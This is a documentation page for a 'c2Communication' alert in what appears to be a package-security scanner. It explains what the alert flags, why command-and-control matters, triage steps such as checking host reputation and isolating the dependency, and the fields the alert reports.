c2Communication

Rendered from docs/alerts/c2Communication.md

Back to index

c2Communication

Flags indicators of command-and-control (C2) behavior, such as suspicious hardcoded domains/URLs or patterns commonly used for beaconing.

Implemented in: src/lib/detection/plugins/c2-communication.ts
Enabled by default: yes

What it means

The package contains strings or code consistent with communicating with attacker infrastructure.

Why it matters

C2 is how malware receives instructions, exfiltrates data, and stages follow-on payloads.

What to do

  • Identify the host(s) and check reputation / WHOIS / history.
  • Inspect call sites to see when communication happens (install-time vs runtime).
  • Block or isolate the dependency until behavior is understood.

Common fields

  • filePath, lineStart/lineEnd, codeSnippet
  • metadata may include the matched IOC (domain/IP/URL) and rule name